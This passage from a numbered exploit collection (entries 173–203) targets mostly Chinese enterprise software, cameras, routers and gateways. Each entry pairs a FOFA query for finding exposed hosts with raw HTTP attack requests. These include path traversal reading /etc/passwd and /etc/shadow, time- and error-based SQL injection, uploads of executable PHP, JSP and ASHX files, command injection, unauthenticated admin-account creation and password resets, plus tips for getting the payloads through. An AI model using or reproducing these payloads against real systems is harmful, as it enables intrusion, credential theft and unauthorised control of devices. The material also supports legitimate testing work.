FOFA: app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Most HTTP clients normalise the ../ segments out of the path before sending; send the request line verbatim (for curl, --path-as-is) so the traversal actually reaches the device.

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 (Jinher OA C6) FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 (telecom gateway configuration management system) rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
Unauthenticated download of the device configuration; request the .cfg whose name matches the device model (one path per model):
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Note that the stored name is taken from the form-data name attribute (12234.txt), not from filename. Verify:
GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

MySQL error-based: the database user name comes back inside the XPATH syntax error raised by updatexml().

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

This creates a real account (test1234 / test1234); remove it after testing.

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Oracle error-based: if the token parameter is injectable, the ORA error text contains 12345654321 (111111*111111). The endpoint is a password-update handler, so keep loginid pointed at an account that does not exist.

184. 迅饶科技 (SunFull) X2Modbus gateway AddUser arbitrary user creation
FOFA: server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

The body is a bare SQL INSERT rather than a SOAP envelope, and it creates a real login (root / 123456); remove it after testing.

185. 瑞友天翼应用虚拟化系统 (Realor) SQL injection
version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

Decoded, appid is a stacked query: 3');select unhex('...') into outfile '.\\..\\..\\WebRoot\\plom.xgi'#. The hex decodes to <?php echo md5("1"); $file = __FILE__; unlink($file); and INTO OUTFILE resolves the relative path against the MySQL data directory. A successful write is confirmed by requesting /plom.xgi: if the server executes it, the page shows c4ca4238a0b923820dcc509a6f75849b (md5 of "1") and the file deletes itself.

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power plants.
FOFA: title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

SQLite has no sleep primitive; this is the heavy-query timing technique (hex-encoding a 250 MB RANDOMBLOB), so compare the response time against the same request with a small blob size rather than against a fixed threshold.

187. Mura CMS processAsyncObject SQL injection (time-based payload for CVE-2024-32640; the error-based form is entry 158)
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewer deleteStudy SQL injection
FOFA: app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The endpoint name indicates a delete operation on clinical records; keep documentUniqueId pointed at a record that does not exist.

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behavior management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyundrive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager/upload endpoint file upload
Fofa:title="Authenticate Please!"

1. Run the PoC to obtain the CSRF token, obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returns csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returns:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (FOUNDER) all-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Substitute the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--